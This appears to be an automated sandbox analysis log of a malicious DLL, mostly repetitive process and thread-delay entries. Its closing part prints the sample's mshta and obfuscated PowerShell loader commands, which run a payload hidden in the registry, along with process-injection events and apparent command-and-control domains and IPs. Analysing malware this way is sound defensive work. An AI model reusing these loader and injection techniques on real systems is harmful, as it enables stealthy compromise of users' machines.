            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084 | Thread sleep time: -1773297476s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7084 | Thread sleep count: 799 > 30
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5772 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612 | Thread sleep count: 6259 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676 | Thread sleep count: 2927 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620 | Thread sleep time: -19369081277395017s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648 | Thread sleep count: 6479 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704 | Thread sleep count: 2798 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 452 | Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224 | Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5224 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5152 | Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (6 identical entries)
            Source: C:\Windows\System32\loaddll32.exe | Window / User API: threadDelayed 390
            Source: C:\Windows\SysWOW64\regsvr32.exe | Window / User API: threadDelayed 799
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 1425
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 506
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 1129
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 1555
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 870
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 862
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6259
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2927
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6479
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2798
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1803
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6739
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2705
            Source: C:\Windows\System32\loaddll32.exe | Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (6 identical entries)
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWh4[
            Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914184707.0000000000FA1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW-b^u
            Source: mshta.exe, 00000016.00000003.382843473.000001823555B000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\7p
            Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.523272114.000000000130A000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
            Source: rundll32.exe, 00000004.00000003.811718040.0000000000F5A000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW@
            Source: mshta.exe, 00000017.00000002.390538379.000002B5EF59B000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (4 identical entries)

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: berukoneru.website
            Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 79.110.52.144 187
            Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: windows.update3.com
            Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 18.219.227.107 187
            Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 3.12.124.139 187
            Maps a DLL or memory area into another process
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: unknown protection: execute and read and write (3 identical entries)
            Writes to foreign memory regions
            Source: C:\Windows\System32\loaddll32.exe | Memory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0 (2 identical entries)
            Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0 (2 identical entries)
            Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0 (4 identical entries)
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3472 (3 identical entries)
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: unknown EIP: 9B851580 (4 identical entries)
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) (3 identical entries)
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) (5 identical entries)
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h (2 identical entries)
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) (3 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
            Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: unknown unknown
            Source: C:\Windows\System32\control.exe | Process created: unknown unknown (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries)
